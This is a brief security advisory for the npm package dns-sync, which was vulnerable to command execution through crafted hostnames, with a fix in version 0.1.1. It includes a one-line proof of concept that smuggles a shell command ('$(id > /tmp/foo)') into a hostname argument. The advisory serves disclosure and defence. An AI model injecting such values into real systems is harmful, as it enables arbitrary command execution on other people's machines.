Affected versions of
dns-sync are vulnerable to arbitrary command execution via maliciously formed hostnames.
Proof of Concept
var dnsSync = require('dns-sync'); console.log(dnsSync.resolve('$(id > /tmp/foo)'));
Update to version 0.1.1 or later.
Have content suggestions? Send them to [email protected]
publishedAdvisory publishedApr 11th, 2017
reportedInitial report by Steve KempOct 27th, 2016